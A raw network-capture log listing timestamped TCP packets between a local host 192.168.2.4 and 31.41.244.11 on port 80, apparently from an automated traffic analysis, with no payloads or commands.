Nov 5, 2024 18:46:10.679934978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679949045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679963112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679970980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679975986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679986954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680008888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680021048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680039883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680053949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680414915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680428982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680447102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680457115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680478096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680486917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680493116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680497885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680536985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680547953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680573940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680584908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680594921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680618048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680664062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680676937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680686951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680740118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680751085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680761099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680763960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680771112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680783033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680788040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680798054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680831909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680907011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680917978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680927038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680938005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680953026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.680960894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.680972099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681001902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681040049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681050062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681060076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681077957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681107044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681107998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681118011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681128025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681140900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681149006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681173086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681193113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681201935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681211948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681237936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681258917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681271076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681281090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681309938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681313038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681319952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681355000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681381941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681392908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681405067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681415081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681426048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681431055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681440115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681466103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681610107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681621075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681637049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681648016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681654930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681658983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681668997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681669950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681689978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681719065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681724072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681734085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681745052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.681767941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.681787014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.682013035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682024956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682034969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682058096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.682081938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.682099104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682110071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682120085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682133913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682142019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.682148933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682151079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.682174921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.682184935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.682219028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682235003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.682257891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.682267904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686014891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686027050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686036110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686067104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686311960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686347961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686357021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686388016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686393976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686402082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686403990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686415911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686423063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686430931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686434984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686449051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686466932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686516047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686528921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686538935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686556101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686559916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686569929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.686580896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.686608076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.687267065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687278986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687289953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687319994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.687329054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.687350988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687362909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687369108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687378883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687395096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687402010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.687405109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687414885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687424898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.687427044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.687441111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.687467098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.688452959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688503027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.688604116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688618898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688628912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688637972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688654900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688657999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.688667059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688678980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688680887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.688688993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688693047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.688699961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688709974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688719988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.688724041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688735008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.688745022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.688755035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.688781023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.689631939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.689666986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.689737082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.689814091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.689824104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.689838886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.689858913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.689899921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.690361023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.690372944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.690382004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.690418005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.690443993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.691581011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.691591024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.691601038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.691646099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.691677094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.691776037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.691787004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.691796064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.691827059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.691853046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.692462921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.692543983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.692553997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.692564964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.692574978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.692596912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.692635059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.693105936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.693166018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.693175077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.693205118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.693212032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.693221092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.693250895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.693286896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.693298101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.693309069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.693320036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.693327904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.693331003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.693346024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.693370104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.694055080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.694066048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.694076061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.694130898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.694611073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.694720030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.694729090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.694741964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.694775105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.694785118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.695559025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.695569992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.695580006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.695600986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.695635080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696139097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696149111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696165085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696198940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696594954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696607113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696616888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696638107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696660995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696688890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696701050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696710110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696732998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696748972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696758986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696765900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696769953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696790934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696820021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696847916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696858883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696872950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.696890116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696916103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.696986914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697046995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697057009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697093010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697138071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697149992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697159052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697169065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697179079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697181940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697202921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697225094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697268009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697278976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697309017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697360992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697371960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697381973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697391033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697401047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697407961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697417021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697427988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697428942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697436094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697443962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697444916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697462082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697468996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697472095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697496891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697506905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697506905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697515965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697516918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697547913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697570086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697624922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697633982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697645903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697664976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697688103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697715044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697724104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697736025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697746038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697758913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697762966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697779894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697787046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697788954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.697810888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.697839022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698014975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698025942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698035955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698060989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698071957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698132992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698144913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698183060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698211908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698223114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698232889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698256016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698276997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698301077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698311090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698329926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698339939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698339939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698354959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698358059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698376894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698405981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698432922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698448896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698460102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698468924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698476076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698478937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698508024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698530912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.698558092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698566914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.698579073 CET	80	49804	31.41.244.11	192.168.2.4
